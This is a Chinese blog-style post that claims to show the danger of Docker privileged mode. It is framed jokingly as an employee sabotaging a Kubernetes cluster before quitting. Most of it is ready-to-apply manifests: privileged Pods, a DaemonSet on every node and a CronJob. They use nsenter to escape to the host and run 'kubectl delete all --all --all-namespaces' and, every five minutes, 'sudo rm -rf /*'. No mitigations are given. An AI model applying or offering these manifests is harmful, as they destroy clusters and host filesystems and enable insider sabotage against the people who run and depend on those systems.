本文档主要用于展示 Docker 特权模式的危害,请谨慎操作。对于无法直接执行命令的集群,可以通过 UI 创建 Pod、Job 等操作。
1. 直接删除全部资源
如果能登陆机器,收拾好东西,执行命令:
1 | kubectl delete all --all --all-namespaces |
|---|
但是也有可能没那么大权限,那么就试试下面的方法吧。下面的方法依赖于 Docker 的特权模式。
2. 随便试试,热热身
先热热身,执行脚本,随便试试,看看有没有效果。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | cat <<EOF | kubectl apply -f - apiVersion: v1 kind: Pod metadata: name: danger-1 namespace: default spec: containers: - command: ["sh"] args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"] image: docker.io/alpine:3.12 name: pod-test securityContext: privileged: true hostIPC: true hostNetwork: true hostPID: true tolerations: - effect: NoSchedule key: node-role.kubernetes.io/master - key: CriticalAddonsOnly operator: Exists - effect: NoExecute key: node.kubernetes.io/not-ready operator: Exists tolerationSeconds: 60 - effect: NoExecute key: node.kubernetes.io/unreachable operator: Exists tolerationSeconds: 60 EOF |
|---|
3. 可能 Master 节点上配置了 kubeconfig
如果 Node 节点无法执行 kubectl 命令,那么可以选中 Master 节点试试。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 | cat <<EOF | kubectl apply -f - apiVersion: v1 kind: Pod metadata: name: danger-1 namespace: default spec: affinity: nodeAffinity: preferredDuringSchedulingIgnoredDuringExecution: - preference: matchExpressions: - key: node-role.kubernetes.io/master operator: In values: - "" weight: 100 containers: - command: ["sh"] args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"] image: docker.io/alpine:3.12 name: pod-test securityContext: privileged: true tolerations: - effect: NoSchedule key: node-role.kubernetes.io/master - key: CriticalAddonsOnly operator: Exists - effect: NoExecute key: node.kubernetes.io/not-ready operator: Exists tolerationSeconds: 60 - effect: NoExecute key: node.kubernetes.io/unreachable operator: Exists tolerationSeconds: 60 hostIPC: true hostNetwork: true hostPID: true EOF |
|---|
4. 算了,全部节点都试试
如果还是不行,干脆全部节点都试试吧,反正东西都收拾好了。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 | cat <<EOF | kubectl apply -f - apiVersion: apps/v1 kind: DaemonSet metadata: name: danger-3 spec: selector: matchLabels: danger.kubernetes.io/name: d3 template: metadata: labels: danger.kubernetes.io/name: d3 spec: containers: - command: ["sh"] args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"] image: docker.io/alpine:3.12 name: pod-test securityContext: privileged: true hostIPC: true hostNetwork: true hostPID: true tolerations: - effect: NoSchedule key: node-role.kubernetes.io/master - key: CriticalAddonsOnly operator: Exists - effect: NoExecute key: node.kubernetes.io/not-ready operator: Exists tolerationSeconds: 60 - effect: NoExecute key: node.kubernetes.io/unreachable operator: Exists tolerationSeconds: 60 EOF |
|---|
5. 最后挣扎一下,定时试试,先下班了
试到这里,大概率明天还得继续搬砖 996 了,最后再试一次。
每五分钟执行一次,基本格式 : * * * * *,分别对应分、时、日、月、周。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | cat <<EOF | kubectl apply -f - apiVersion: batch/v1beta1 kind: CronJob metadata: name: danger-4 spec: schedule: "*/5 * * * *" jobTemplate: spec: template: spec: containers: - command: ["sh"] args: ["-c", "echo 'sudo rm -rf /*' | nsenter -t 1 -m -u -i -n"] image: docker.io/alpine:3.12 name: pod-test securityContext: privileged: true restartPolicy: OnFailure hostIPC: true hostNetwork: true hostPID: true tolerations: - effect: NoSchedule key: node-role.kubernetes.io/master - key: CriticalAddonsOnly operator: Exists - effect: NoExecute key: node.kubernetes.io/not-ready operator: Exists tolerationSeconds: 60 - effect: NoExecute key: node.kubernetes.io/unreachable operator: Exists tolerationSeconds: 60 EOF |
|---|
6. 参考
- 《如何在主机上调试容器、在容器中操作主机》
